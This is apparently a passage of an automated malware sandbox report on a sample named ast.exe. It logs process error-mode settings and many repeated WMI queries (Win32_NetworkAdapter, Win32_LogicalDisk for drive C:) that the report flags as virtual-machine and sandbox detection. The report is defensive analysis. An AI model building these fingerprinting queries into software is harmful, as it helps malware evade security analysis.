                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter
                          Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
